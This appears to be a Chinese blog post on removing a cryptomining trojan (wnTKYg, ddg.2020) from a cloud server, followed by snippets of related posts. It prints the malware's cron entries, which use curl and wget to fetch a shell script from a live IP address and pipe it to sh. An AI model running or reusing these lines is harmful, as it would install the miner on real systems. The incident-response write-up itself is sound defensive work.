挖礦程式草草草
公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖)
記一次伺服器被挖礦程式*的解決過程
這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被*了,那就得幹掉它,下面是解決過程:
1:第一步要先找到這個wnTKYg檔案實體,對了還有一個叫ddg.2020的程序。
[root@alitest ~]$ find / -name wnTKYg
/tmp/wnTKYg
[root@alitest ~]$ find / -name ddg*
/tmp/ddg .2020
2:接著把這兩個檔案的可執行許可權拿掉。
[root@alitest ~]$ cd /tmp
[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg
3:殺掉這該死的程序。
[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9
4:清除無用的定時任務。
[root@alitest /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i .sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
這是挖礦程式生成的定時任務,不清除掉待會程序又起來了。
[root@alitest /tmp]$ echo > /var/spool/cron/root
因為這臺機器上沒有做定時任務,所以就直接清除掉了,如果有其他在用的定時任務,不要這樣哦。
5:刪除挖礦程式。
[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg
6:清除.ssh/下的公鑰檔案。
[root@alitest ~/.ssh]$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................
這臺機器並沒有上傳過公鑰檔案,所以這就是*者留下的咯,刪掉刪掉。
[[email protected] ~/.ssh]$ rm -f authorized_keys
至此,*就已經清理完畢了。
相關推薦
挖礦程式草草草
公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 記一次伺服器被挖礦程式*的解決過程 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我
zigw 和 nanoWatch, libudev.so 和 XMR 挖礦程式查殺記錄 XMR惡意挖礦指令碼處理筆記
最近這兩天以來,伺服器一致聲音很響。本來以為有同事在執行大的程式,結果後來發現持續很長時間都是這樣,並沒有停的樣子。後來查了一下,發現有幾個可疑程序導致,幹掉之後,果然伺服器靜悄悄了。 但是,問題並沒有結束,過了一會兒,伺服器又開始轟鳴了,查找了一下,這裡簡單記錄一下。 1.檢視top結果,可見如下情況:
記錄初次跑ETH挖礦程式的技術review
p { margin-bottom: 0.1in; line-height: 115% } Mining review 在開始工作之前我對挖礦還處於一個很淺顯的概念: 公式機制Pow工作量,通過計算得到某個數值獲得報酬:報酬是得到的區塊通過轉賬到區塊鏈錢包 獲得。但是實際running程式起來還是一頭
生產Server遭挖礦程式入侵,暴力佔用CPU
區塊鏈的火熱,利益驅使必然導致不少PC或Server,被變成肉雞,執行挖礦程式進行挖礦,進而導致我們正常的程式無法正常。 (Centos7 Server)使用top命令檢視伺服器程序執行情況,發現幾個較詭異程序。CPU戰用長期居高不下,系統負載load aver
阿里雲ECS遭挖礦程式攻擊解決方法(徹底清除挖礦程式,順便下載了挖礦程式的指令碼)
一:殺死挖礦程式程序 在伺服器上使用top指令檢視cpu的使用情況,發現有一個叫java的程式佔用cpu高達99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
解決阿里雲伺服器提示挖礦程式風險
今天大早上收到阿里雲郵件通知,提示有挖礦程式。一個激靈爬起來,折騰了一早上,終於解決問題了。 其實前兩天就一直收到阿里雲的通知,檢測到對外攻擊,阻斷了對其他伺服器6379、 6380和22埠的訪問,當時沒怎麼當一回兒事,反正是我用來自己學習用的,就放著不管了,結果今天事態就大了。
linux清除隱藏的挖礦程式
排查過程: 1、top檢視,找佔CPU高的程序: 通過按照CPU佔比降序檢視,除了少數幾個程序佔CPU,並沒有發現可疑程式 佔用CPU高的挖礦程式應該是隱藏在某個地方了, 2、使用命令ps -aux --sort=-pcpu|head -10查詢,果然找到了這個程式:
Linux伺服器被挖礦程式sustse和kworkerds感染後續處理
在上一篇博文Linux系統發現佔用CPU達100%的程序並處理 裡面以為已經把挖礦程式sustse處理乾淨了,可是沒過兩天又收到阿里雲簡訊提醒,說伺服器有問題,難道還有後門嗎?也多虧阿里雲給出提示“出現了可疑安全事件:Linux共享庫檔案預載入配置檔案可疑篡改”。網上查了查相關內容,原來這個
【踩坑】阿里雲ECS清除隱藏的挖礦程式
問題描述: 一臺阿里雲伺服器,收到連續告警CPU使用量已經大於95%。但這臺機器上面使用中的業務只有一個不常使用的MySQL,其他就沒有了,正常情況下CPU是不可能達到這麼高的。檢視告警資訊,發現有被植入挖礦程式,可疑程式檔案路徑為 /usr/lib/libiacpkmn.so.3 排查過程
阿里雲提示伺服器有挖礦程式 該如何處理
臨近2018年底,我們阿里雲上的一臺ECS伺服器竟然被阿里雲簡訊提示有挖礦程式,多次收到阿里雲的簡訊提醒說什麼伺服器被植入挖礦程式,造成系統資源大量消耗;而且還收到CPU使用率達到百分之90的安全提醒,我們的伺服器上並沒有執行大量的網站,只是一個公司的展示網站,怎麼可能會出現CPU%90以上的告警,
【警惕】大量未修復WebLogic WSAT元件RCE漏洞的主機被挖礦程式攻擊
警惕從1月1日開始,大量未修復WebLogic WSAT(全稱:Web Services Ato
記Jenkins攻擊2-門羅幣挖礦程式
curl -OL https://github.com/xmrig/xmrig/releases/download/v2.8.3/xmrig-2.8.3-xenial-amd64.tar.gz; tar xvzf xmrig-2.8.3-xenial-amd64.t
記一次伺服器被挖礦程式佔用的解決過程
公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被**
阿里雲遇到imWBR1挖礦程式的入侵
在買了阿里雲伺服器,配置了Redis後沒幾天,阿里雲就提醒我說有疑似挖礦的程式在伺服器上,這讓運維小白的我很吃驚,而且自己也沒做過伺服器運維的事,在網上百度了很多,也翻牆google了很多後發現了一篇關於殺死挖礦程序的部落格,轉載給大家看看,http://blog.sina
攻擊者通過 Windows 自帶工具載入挖礦程式的檢測分析
譯文宣告 譯文僅供參考,具體內容表達以及含義原文為準 前言 我在職業生涯早期學到的一個教訓是,技術專業人員通常會繼承老問題。對於負責網路服務和安全的管理員來說尤其如此,因為他們繼承了最大的問題:企業 網路。隨著網路的老化,網路往往變得更加難以安全和維護,而管理員
遭遇挖礦程式續集_詳解黑客攻擊步驟
下載連結: http://download.csdn.net/download/landehutu/10218235 背景:前幾天寫了一下遭遇挖礦程式後的處理步驟,當時弄了一個活體下來,但是沒有說明那幾個程式的細節,今天補上。 程式細節說明: 黑客先找到系統的漏洞,獲
阿里雲伺服器被挖礦程式minerd入侵的終極解決辦法
歡迎掃碼加入Java高知群交流 突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm
挖礦程式入侵解決方案
本人自己購買了一臺阿里雲伺服器來玩,晚上收到被挖礦機程式入侵,處理過程大概是這樣的使用top命令檢視看那些程序是陌生的並且佔用大量cpu,因為是挖礦機肯定會佔用很多cpu,先不要著急kill掉,因為一般都會重啟啟動的,我用history(也可以檢視~/.bash_histor
曲速未來 :解析Kodi安裝的外掛遭惡意程式挖礦活動
概述 Kodi是一個免費的開放原始碼媒體播放器軟體應用程式。由於其開源和跨平臺特性,且以C ++編寫的核心程式碼而被廣泛應用。該軟體最近因侵權問題關閉了第三方附加元件XvBMC,而在這個元件被關閉之後,有研究人員發現這個第三方擴充套件庫
程式設計師利用公司伺服器挖礦被舉報,網友:和刪庫的哥們有的一比
進入2017年,以比特幣、以太坊為首的數字貨幣是徹徹底底地火了。原因無他,就是幣價暴漲。 在這樣的一個大背景下,一個叫做“礦工”的群體也逐漸走入了我們的視線。作為數字貨幣的挖掘者,“礦工”到底是怎樣的一個群體呢?近日就有一位程式設計師因為利用公司伺服器挖礦,而被舉報了。